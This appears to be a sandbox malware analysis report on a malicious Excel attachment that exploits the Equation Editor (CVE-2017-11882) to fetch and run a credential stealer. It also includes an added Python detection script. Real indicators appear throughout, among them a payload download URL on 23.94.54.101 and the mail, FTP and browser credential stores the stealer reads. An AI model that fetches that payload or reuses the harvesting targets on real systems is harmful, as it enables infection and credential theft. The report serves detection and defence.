                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File opened: C:\FTP Navigator\Ftplist.txt
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
                  Source: CKK.exe Binary or memory string: WIN_81
                  Source: CKK.exe Binary or memory string: WIN_XP
                  Source: CKK.exe.2.dr Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_11WIN_10WIN_2022WIN_2019WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\AppearanceUSERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYRegDeleteKeyExWadvapi32.dll+.-.\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs](*UCP)\XISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGGETCOUNTSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXPANDmsctls_statusbar321tooltips_class32%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progress32msctls_trackbar32SysAnimate32msctls_updown32SysTabControl32SysTreeView32SysListView32-----@GUI_DRAGID@GUI_DROPID@GUI_DRAGFILEError text not found (please report)Q\EDEFINEUTF16)UTF)UCP)NO_AUTO_POSSESS)NO_START_OPT)LIMIT_MATCH=LIMIT_RECURSION=CR)LF)CRLF)ANY)ANYCRLF)BSR_ANYCRLF)BSR_UNICODE)argument is not a compiled regular expressionargument not compiled in 16 bit modeinternal error: opcode not recognizedinternal error: missing capturing bracketfailed to get memory
                  Source: CKK.exe Binary or memory string: WIN_XPe
                  Source: CKK.exe Binary or memory string: WIN_VISTA
                  Source: CKK.exe Binary or memory string: WIN_7
                  Source: CKK.exe Binary or memory string: WIN_8
                  Source: Yara match, File source: 00000004.00000002.608494898.0000000002493000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

                  Remote Access Functionality

                  Source: Yara match, File source: 4.2.RegSvcs.exe.450ee8.2.unpack, type: UNPACKEDPE
                  Source: Yara match, File source: 4.2.RegSvcs.exe.450000.1.unpack, type: UNPACKEDPE
                  Source: Yara match, File source: 4.2.RegSvcs.exe.450000.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara match, File source: 4.2.RegSvcs.exe.a6ff36.4.raw.unpack, type: UNPACKEDPE
                  Source: Yara match, File source: 4.2.RegSvcs.exe.a6f04e.5.raw.unpack, type: UNPACKEDPE
                  Source: Yara match, File source: 4.2.RegSvcs.exe.3446458.6.unpack, type: UNPACKEDPE
                  Source: Yara match, File source: 4.2.RegSvcs.exe.4c0000.3.unpack, type: UNPACKEDPE
                  Source: Yara match, File source: 4.2.RegSvcs.exe.3497170.7.unpack, type: UNPACKEDPE
                  Source: Yara match, File source: 4.2.RegSvcs.exe.a6f04e.5.unpack, type: UNPACKEDPE
                  Source: Yara match, File source: 4.2.RegSvcs.exe.450ee8.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara match, File source: 4.2.RegSvcs.exe.4c0000.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara match, File source: 4.2.RegSvcs.exe.3497170.7.raw.unpack, type: UNPACKEDPE
                  Source: Yara match, File source: 4.2.RegSvcs.exe.3446458.6.raw.unpack, type: UNPACKEDPE
                  Source: Yara match, File source: 4.2.RegSvcs.exe.a6ff36.4.unpack, type: UNPACKEDPE
                  Source: Yara match, File source: 00000004.00000002.608390113.00000000004C0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara match, File source: 00000004.00000002.608372790.0000000000450000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara match, File source: 00000004.00000002.608574126.0000000003441000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match, File source: 00000004.00000002.608436273.0000000000A2F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match, File source: Process Memory Space: RegSvcs.exe PID: 1128, type: MEMORYSTR
                  Source: Yara matchFile source: 4.2.RegSvcs.exe.450ee8.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 4.2.RegSvcs.exe.450000.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 4.2.RegSvcs.exe.450000.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 4.2.RegSvcs.exe.a6ff36.4.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 4.2.RegSvcs.exe.a6f04e.5.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 4.2.RegSvcs.exe.3446458.6.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 4.2.RegSvcs.exe.4c0000.3.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 4.2.RegSvcs.exe.3497170.7.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 4.2.RegSvcs.exe.a6f04e.5.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 4.2.RegSvcs.exe.450ee8.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 4.2.RegSvcs.exe.4c0000.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 4.2.RegSvcs.exe.3497170.7.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 4.2.RegSvcs.exe.3446458.6.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 4.2.RegSvcs.exe.a6ff36.4.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000004.00000002.608390113.00000000004C0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000004.00000002.608372790.0000000000450000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000004.00000002.608574126.0000000003441000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000004.00000002.608436273.0000000000A2F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 4.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 4.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 3.2.CKK.exe.140000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000004.00000002.608358959.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000003.00000002.447488825.0000000000140000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: C:\Users\user\AppData\Roaming\CKK.exeCode function: 3_2_00EC1204 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket,3_2_00EC1204
                  Source: C:\Users\user\AppData\Roaming\CKK.exeCode function: 3_2_00EC1806 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,3_2_00EC1806
MITRE ATT&CK Matrix: techniques with matching signatures, grouped by tactic (the digits shown in front of a technique in the rendered matrix are its signature-count badges; they are kept in parentheses)

Reconnaissance: none flagged
Resource Development: Scripting (1)
Initial Access: Valid Accounts (2)
Execution: Windows Management Instrumentation (121), Native API (2), Exploitation for Client Execution (33)
Persistence: Scripting (1), DLL Side-Loading (1), Valid Accounts (2)
Privilege Escalation: Exploitation for Privilege Escalation (1), DLL Side-Loading (1), Valid Accounts (2), Access Token Manipulation (21), Process Injection (212)
Defense Evasion: Disable or Modify Tools (11), Deobfuscate/Decode Files or Information (11), Obfuscated Files or Information (2), Software Packing (1), DLL Side-Loading (1), Masquerading (1), Valid Accounts (2), Virtualization/Sandbox Evasion (12), Access Token Manipulation (21), Process Injection (212)
Credential Access: OS Credential Dumping (2), Input Capture (121), Credentials in Registry (1)
Discovery: System Time Discovery (2), Account Discovery (1), File and Directory Discovery (2), System Information Discovery (38), Security Software Discovery (25), Virtualization/Sandbox Evasion (12), Process Discovery (2), Application Window Discovery (1), System Owner/User Discovery (1), Remote System Discovery (1), System Network Configuration Discovery (1)
Lateral Movement: none flagged
Collection: Archive Collected Data (11), Data from Local System (2), Email Collection (1), Input Capture (121), Clipboard Data (3)
Command and Control: Ingress Tool Transfer (12), Encrypted Channel (11), Non-Application Layer Protocol (2), Application Layer Protocol (23)
Exfiltration: none flagged
Impact: System Shutdown/Reboot (1)

                  Legend:

                  • Process
                  • Signature
                  • Created File
                  • DNS/IP Info
                  • Is Dropped
                  • Is Windows Process
                  • Number of created Registry Values
                  • Number of created Files
                  • Visual Basic
                  • Delphi
                  • Java
                  • .Net C# or VB.NET
                  • C, C++ or other language
                  • Is malicious
                  • Internet
Behavior Graph ID: 1435421; Sample: PO 2_5_24.xlam.xlsx; Start date: 02/05/2024; Architecture: WINDOWS; Score: 100

Sample-level signatures: Multi AV Scanner detection for domain / URL; Found malware configuration; Malicious sample detected (through community Yara rule); 17 other signatures

Process tree:
• EXCEL.EXE (graph node 8; counts 6 11) started
  • EQNEDT32.EXE (graph node 10; count 1) started by EXCEL.EXE
    Network: 23.94.54.101, port 80 (from local port 49161), AS-COLOCROSSINGUS, United States
    Dropped: C:\Users\user\AppData\Roaming\CKK.exe (PE32)
    Signatures: Office equation editor establishes network connection; Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
    • CKK.exe (graph node 15; count 4) started by EQNEDT32.EXE
      Signatures: Multi AV Scanner detection for dropped file; Binary is likely a compiled AutoIt script file; Machine Learning detection for dropped file; 2 other signatures
      • RegSvcs.exe (graph node 18; counts 12 2) started by CKK.exe
        Network: api.ipify.org 104.26.12.205, port 443 (from local port 49162), CLOUDFLARENETUS, United States
        Signatures: Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc); Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines); Tries to steal Mail credentials (via file / registry access); 2 other signatures
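The chain in the behavior graph (EXCEL.EXE spawning EQNEDT32.EXE, which connects to 23.94.54.101, writes CKK.exe under %AppData% and launches it, which in turn starts RegSvcs.exe) is exactly what the Sigma rules listed in the signature overview key on. The hunting logic below is an added example, not Joe Sandbox or Sigma code: the event records are constructed Sysmon-style dictionaries that reproduce the chain with the graph's node ids as PIDs, the installation paths of EXCEL.EXE, EQNEDT32.EXE and RegSvcs.exe and the benign noise events are assumptions, and the rule names are this example's own.

```python
"""Hunting rules for the Equation Editor chain seen in this report:
EXCEL.EXE -> EQNEDT32.EXE -> drops %AppData%\\CKK.exe -> CKK.exe -> RegSvcs.exe

Added example; not Joe Sandbox code. Events are constructed, Sysmon-style
dicts (process create, file create, network connect).
"""
from __future__ import annotations

import ntpath

OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
EQNEDT = "eqnedt32.exe"
USER_DIR_MARKERS = ("\\users\\", "\\appdata\\", "\\temp\\")

# Assumed install paths; only CKK.exe's path comes from the report.
EXCEL = r"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE"
EQN = r"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE"
CKK = r"C:\Users\user\AppData\Roaming\CKK.exe"
REGSVCS = r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"

# Constructed telemetry mirroring the graph (8/10/15/18 are graph node ids,
# used here as PIDs, not the real Windows PIDs).
EVENTS = [
    {"type": "process", "pid": 8, "image": EXCEL, "ppid": 1,
     "parent_image": r"C:\Windows\explorer.exe"},
    {"type": "process", "pid": 10, "image": EQN, "ppid": 8, "parent_image": EXCEL},
    {"type": "network", "pid": 10, "image": EQN,
     "dst_ip": "23.94.54.101", "dst_port": 80},
    {"type": "file", "pid": 10, "image": EQN, "target": CKK, "magic": "MZ"},
    {"type": "process", "pid": 15, "image": CKK, "ppid": 10, "parent_image": EQN},
    {"type": "process", "pid": 18, "image": REGSVCS, "ppid": 15, "parent_image": CKK},
    {"type": "network", "pid": 18, "image": REGSVCS,
     "dst_ip": "104.26.12.205", "dst_port": 443},
]

# Constructed benign noise: Excel saving a workbook and reaching a file share.
BENIGN = [
    {"type": "process", "pid": 40, "image": EXCEL, "ppid": 1,
     "parent_image": r"C:\Windows\explorer.exe"},
    {"type": "file", "pid": 40, "image": EXCEL,
     "target": r"C:\Users\user\Documents\budget.xlsx", "magic": "PK"},
    {"type": "network", "pid": 40, "image": EXCEL,
     "dst_ip": "10.0.0.5", "dst_port": 445},
]


def _name(path: str) -> str:
    return ntpath.basename(path).lower()


def _in_user_dir(path: str) -> bool:
    low = path.lower()
    return any(marker in low for marker in USER_DIR_MARKERS)


def hunt(events: list[dict]) -> list[tuple[str, int]]:
    """Return (rule, pid) pairs for events that match the Equation Editor rules."""
    hits: list[tuple[str, int]] = []
    for ev in events:
        img = _name(ev["image"])
        if ev["type"] == "process":
            parent = _name(ev["parent_image"])
            if parent in OFFICE_APPS and img == EQNEDT:
                hits.append(("office_spawns_equation_editor", ev["pid"]))
            if parent == EQNEDT:
                hits.append(("equation_editor_child_process", ev["pid"]))
            if (parent in OFFICE_APPS or parent == EQNEDT) and _in_user_dir(ev["image"]):
                hits.append(("user_dir_binary_from_office", ev["pid"]))
        elif ev["type"] == "network" and img == EQNEDT:
            hits.append(("equation_editor_network_connection", ev["pid"]))
        elif ev["type"] == "file" and img == EQNEDT and ev.get("magic") == "MZ":
            hits.append(("equation_editor_drops_pe", ev["pid"]))
    return hits


def lineage(events: list[dict], pid: int) -> list[str]:
    """Walk process-create events from pid up to the root; oldest ancestor first."""
    by_pid = {ev["pid"]: ev for ev in events if ev["type"] == "process"}
    chain: list[str] = []
    while pid in by_pid:
        chain.append(ntpath.basename(by_pid[pid]["image"]))
        pid = by_pid[pid]["ppid"]
    return chain[::-1]


if __name__ == "__main__":
    for rule, pid in hunt(EVENTS + BENIGN):
        print(f"{rule:36} pid={pid}  {' -> '.join(lineage(EVENTS, pid))}")
```

Each rule fires on a single event, so the five hits together reconstruct the graph without needing the signature engine; `lineage` is what turns a RegSvcs.exe alert back into "Excel opened a document that exploited Equation Editor".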

Antivirus detection, submitted sample
Source | Detection | Scanner | Label
PO 2_5_24.xlam.xlsx | 53% | Virustotal | none
PO 2_5_24.xlam.xlsx | 63% | ReversingLabs | Document-Office.Exploit.CVE-2017-11882
PO 2_5_24.xlam.xlsx | 100% | Avira | EXP/CVE-2017-11882.Gen

Antivirus detection, dropped files
Source | Detection | Scanner | Label
C:\Users\user\AppData\Roaming\CKK.exe | 100% | Joe Sandbox ML | none
C:\Users\user\AppData\Roaming\CKK.exe | 39% | ReversingLabs | none
C:\Users\user\AppData\Roaming\CKK.exe | 40% | Virustotal | none

No Antivirus matches
No Antivirus matches

Antivirus detection, URLs
Source | Detection | Scanner | Label
http://crl.pkioverheid.nl/DomOvLatestCRL.crl0 | 0% | URL Reputation | safe
http://ocsp.entrust.net03 | 0% | URL Reputation | safe
http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0 | 0% | URL Reputation | safe
http://www.diginotar.nl/cps/pkioverheid0 | 0% | URL Reputation | safe
http://ocsp.entrust.net0D | 0% | URL Reputation | safe
http://23.94.54.101/ISW.exe | 0% | Avira URL Cloud | safe
https://api.ipif8z | 0% | Avira URL Cloud | safe
http://23.94.54.101/ISW.exe | 7% | Virustotal | none
Domains
Name | IP | Active | Malicious | Antivirus Detection | Reputation
api.ipify.org | 104.26.12.205 | true | false | none | high

URLs
Name | Malicious | Antivirus Detection | Reputation
https://api.ipify.org/ | false | none | high
http://23.94.54.101/ISW.exe | true | 7% Virustotal; Avira URL Cloud: safe | unknown
URLs found in memory
Name | Source | Malicious | Antivirus Detection | Reputation
https://api.ipify.org | RegSvcs.exe, 00000004.00000002.608372790.0000000000450000.00000004.08000000.00040000.00000000.sdmp; RegSvcs.exe, 00000004.00000002.608390113.00000000004C0000.00000004.08000000.00040000.00000000.sdmp; RegSvcs.exe, 00000004.00000002.608494898.0000000002441000.00000004.00000800.00020000.00000000.sdmp; RegSvcs.exe, 00000004.00000002.608494898.0000000002538000.00000004.00000800.00020000.00000000.sdmp; RegSvcs.exe, 00000004.00000002.608574126.0000000003441000.00000004.00000800.00020000.00000000.sdmp; RegSvcs.exe, 00000004.00000002.608494898.00000000024FC000.00000004.00000800.00020000.00000000.sdmp; RegSvcs.exe, 00000004.00000002.608436273.0000000000A2F000.00000004.00000020.00020000.00000000.sdmp | false | none | high
http://crl.pkioverheid.nl/DomOvLatestCRL.crl0 | RegSvcs.exe, 00000004.00000002.608641256.00000000056F4000.00000004.00000020.00020000.00000000.sdmp; RegSvcs.exe, 00000004.00000002.608641256.00000000056E1000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://account.dyn.com/ | RegSvcs.exe, 00000004.00000002.608372790.0000000000450000.00000004.08000000.00040000.00000000.sdmp; RegSvcs.exe, 00000004.00000002.608390113.00000000004C0000.00000004.08000000.00040000.00000000.sdmp; RegSvcs.exe, 00000004.00000002.608574126.0000000003441000.00000004.00000800.00020000.00000000.sdmp; RegSvcs.exe, 00000004.00000002.608436273.0000000000A2F000.00000004.00000020.00020000.00000000.sdmp | false | none | high
http://crl.entrust.net/server1.crl0 | RegSvcs.exe, 00000004.00000002.608641256.00000000056F4000.00000004.00000020.00020000.00000000.sdmp; RegSvcs.exe, 00000004.00000002.608641256.00000000056E1000.00000004.00000020.00020000.00000000.sdmp | false | none | high
http://ocsp.entrust.net03 | RegSvcs.exe, 00000004.00000002.608641256.00000000056F4000.00000004.00000020.00020000.00000000.sdmp; RegSvcs.exe, 00000004.00000002.608641256.00000000056E1000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://api.ipif8z | RegSvcs.exe, 00000004.00000002.608494898.0000000002538000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0 | RegSvcs.exe, 00000004.00000002.608641256.00000000056E1000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.diginotar.nl/cps/pkioverheid0 | RegSvcs.exe, 00000004.00000002.608641256.00000000056F4000.00000004.00000020.00020000.00000000.sdmp; RegSvcs.exe, 00000004.00000002.608641256.00000000056E1000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://api.ipify.org/T | RegSvcs.exe, 00000004.00000002.608494898.0000000002538000.00000004.00000800.00020000.00000000.sdmp | false | none | high
https://api.ipify.org/t | RegSvcs.exe, 00000004.00000002.608494898.0000000002441000.00000004.00000800.00020000.00000000.sdmp; RegSvcs.exe, 00000004.00000002.608494898.0000000002538000.00000004.00000800.00020000.00000000.sdmp | false | none | high
http://ocsp.entrust.net0D | RegSvcs.exe, 00000004.00000002.608641256.00000000056F4000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | RegSvcs.exe, 00000004.00000002.608494898.0000000002441000.00000004.00000800.00020000.00000000.sdmp; RegSvcs.exe, 00000004.00000002.608494898.0000000002538000.00000004.00000800.00020000.00000000.sdmp | false | none | high
https://secure.comodo.com/CPS0 | RegSvcs.exe, 00000004.00000002.608641256.00000000056F4000.00000004.00000020.00020000.00000000.sdmp; RegSvcs.exe, 00000004.00000002.608641256.00000000056E1000.00000004.00000020.00020000.00000000.sdmp | false | none | high
http://crl.entrust.net/2048ca.crl0 | RegSvcs.exe, 00000004.00000002.608641256.00000000056F4000.00000004.00000020.00020000.00000000.sdmp | false | none | high
http://api.ipify.org | RegSvcs.exe, 00000004.00000002.608494898.0000000002556000.00000004.00000800.00020000.00000000.sdmp | false | none | high
Contacted IPs
IP | Domain | Country | ASN | ASN Name | Malicious
104.26.12.205 | api.ipify.org | United States | 13335 | CLOUDFLARENETUS | false
23.94.54.101 | unknown | United States | 36352 | AS-COLOCROSSINGUS | true
Joe Sandbox version: 40.0.0 Tourmaline
Analysis ID: 1435421
Start date and time: 2024-05-02 17:38:11 +02:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 7m 22s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: defaultwindowsofficecookbook.jbs
Analysis system description: Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Number of new started processes analysed: 7
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: PO 2_5_24.xlam.xlsx
Detection: MAL
Classification: mal100.troj.spyw.expl.evad.winXLSX@6/8@2/2
EGA Information:
• Successful, ratio: 100%
HCA Information:
• Successful, ratio: 94%
• Number of executed functions: 109
• Number of non-executed functions: 255
Cookbook Comments:
• Found application associated with file extension: .xlsx
• Found Word or Excel or PowerPoint or XPS Viewer
• Attach to Office via COM
• Active ActiveX Object
• Scroll down
• Close Viewer
• Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe
• HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
• Report size exceeded maximum capacity and may have missing disassembly code.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
Time | Type | Description
17:39:44 | API Interceptor | 17x Sleep call for process: EQNEDT32.EXE modified
17:39:47 | API Interceptor | 20x Sleep call for process: RegSvcs.exe modified
Related samples sharing an IP
Match | Associated Sample Name / URL | Detection | Threat Name | Context
104.26.12.205 | Sonic-Glyder.exe | malicious | Stealit | api.ipify.org/?format=json
104.26.12.205 | Sky-Beta.exe | malicious | Stealit | api.ipify.org/?format=json
104.26.12.205 | SecuriteInfo.com.Backdoor.Win32.Agent.myuuxz.13708.17224.exe | malicious | Bunny Loader | api.ipify.org/
104.26.12.205 | lods.cmd | malicious | Remcos | api.ipify.org/
23.94.54.101 | Order Request1_5_24.xlam.xlsx | malicious | AgentTesla, PureLog Stealer, RedLine | 23.94.54.101/IZG.exe
23.94.54.101 | 202404294766578200.xlam.xlsx | malicious | Remcos | 23.94.54.101/GVV.exe
23.94.54.101 | attachment.xlam.xlsx | malicious | AgentTesla, PureLog Stealer, RedLine | 23.94.54.101/EPQ.exe
23.94.54.101 | NI-45733-D.xlam.xlsx | malicious | AgentTesla, PureLog Stealer, RedLine | 23.94.54.101/ESS.exe

Related samples sharing a domain
Match | Associated Sample Name / URL | Detection | Threat Name | Context
api.ipify.org | SC-246214.doc | malicious | AgentTesla | 172.67.74.152
api.ipify.org | NOA.exe | malicious | AgentTesla, PureLog Stealer | 172.67.74.152
api.ipify.org | Approved E-DO PDF.exe | malicious | AgentTesla, PureLog Stealer | 104.26.13.205
api.ipify.org | Order No Q240419617006.exe | malicious | AgentTesla, PureLog Stealer | 104.26.12.205
api.ipify.org | Purchase Order05022024.exe | malicious | AgentTesla, GuLoader | 172.67.74.152
api.ipify.org | irlsheis.doc | malicious | AgentTesla, PureLog Stealer | 172.67.74.152
api.ipify.org | noa.exe | malicious | AgentTesla, PureLog Stealer | 172.67.74.152
api.ipify.org | GX_MV Sunshine 07483032r_pdf.exe | malicious | AgentTesla | 104.26.12.205
api.ipify.org | product.exe | malicious | AgentTesla | 104.26.12.205
api.ipify.org | cXPFfk0pBp7bEsb.pif.exe | malicious | AgentTesla, PureLog Stealer | 104.26.12.205

Related samples sharing an ASN
Match | Associated Sample Name / URL | Detection | Threat Name | Context
CLOUDFLARENETUS | SC-246214.doc | malicious | AgentTesla | 172.67.74.152
CLOUDFLARENETUS | INQUIRY#46789.xla.xlsx | malicious | Remcos | 172.67.206.230
CLOUDFLARENETUS | file.exe | malicious | LummaC | 104.21.95.19
CLOUDFLARENETUS | https://gamma.app/docs/Untitled-9umekc4egyknsob | malicious | HTMLPhisher | 104.17.25.14
CLOUDFLARENETUS | https://pot.soundestlink.com/ce/c/6632d4bee95a733e5b11f90c/66336ffc6318519b93081379/663370167f943a5ca8cda723?signature=f078b55518dec9be5687b83cc67125e09d569e23f92457525770ae31d9667613 | malicious | HtmlDropper, HTMLPhisher | 172.67.129.30
CLOUDFLARENETUS | oO2wHSVFJM.exe | malicious | RisePro Stealer | 104.26.5.15
CLOUDFLARENETUS | 9d565bee-e6ce-1842-e729-b0df8f08ed34.eml | malicious | HTMLPhisher | 172.64.41.3
CLOUDFLARENETUS | http://jimdo-storage.global.ssl.fastly.net/file/a45fef49-77a5-4e4b-b081-f19dd1b9626e/b0aa30c8-07ba-4acf-a6e6-856aaa7da320.pdf (three analyses) | malicious | Unknown | 162.159.61.3
AS-COLOCROSSINGUS | er).xla.xlsx | malicious | Unknown | 192.3.109.135
AS-COLOCROSSINGUS | SAL_000268_DOM.xls | malicious | Unknown | 198.12.81.162
AS-COLOCROSSINGUS | INQUIRY#46789.xla.xlsx | malicious | Remcos | 107.175.242.96
AS-COLOCROSSINGUS | 5801.xls | malicious | Unknown | 192.3.179.142
AS-COLOCROSSINGUS | GVV.exe | malicious | Remcos | 23.94.53.100
AS-COLOCROSSINGUS | Notice.xls | malicious | Unknown | 192.3.239.4
AS-COLOCROSSINGUS | irlsheis.doc | malicious | AgentTesla, PureLog Stealer | 192.3.239.4
AS-COLOCROSSINGUS | Order Request1_5_24.xlam.xlsx | malicious | AgentTesla, PureLog Stealer, RedLine | 23.94.54.101
AS-COLOCROSSINGUS | 202404294766578200.xlam.xlsx | malicious | Remcos | 23.94.53.100
AS-COLOCROSSINGUS | OWrVfOdM62.rtf | malicious | AgentTesla, PureLog Stealer | 192.3.239.4

Related samples sharing a JA3 fingerprint
Match | Associated Sample Name / URL | Detection | Threat Name | Context
36f7277af969a6947a61ae0b815907a1 | SC-246214.doc | malicious | AgentTesla | 104.26.12.205
36f7277af969a6947a61ae0b815907a1 | OWrVfOdM62.rtf | malicious | AgentTesla, PureLog Stealer | 104.26.12.205
36f7277af969a6947a61ae0b815907a1 | ET2431000075 & ET2431000076.xls | malicious | AgentTesla, PureLog Stealer | 104.26.12.205
36f7277af969a6947a61ae0b815907a1 | attachment.xlam.xlsx | malicious | AgentTesla, PureLog Stealer, RedLine | 104.26.12.205
36f7277af969a6947a61ae0b815907a1 | NI-45733-D.xlam.xlsx | malicious | AgentTesla, PureLog Stealer, RedLine | 104.26.12.205
36f7277af969a6947a61ae0b815907a1 | Payment Swift.doc | malicious | AgentTesla | 104.26.12.205
36f7277af969a6947a61ae0b815907a1 | gmb.xls | malicious | Unknown | 104.26.12.205
36f7277af969a6947a61ae0b815907a1 | scripttodo.ps1 | malicious | Unknown | 104.26.12.205
36f7277af969a6947a61ae0b815907a1 | New Quotation.doc | malicious | AgentTesla | 104.26.12.205
36f7277af969a6947a61ae0b815907a1 | UGS - CRO REQ - KHIDUBAI (OPL-841724).scr | malicious | PureLog Stealer, zgRAT | 104.26.12.205

Related dropped files: No context
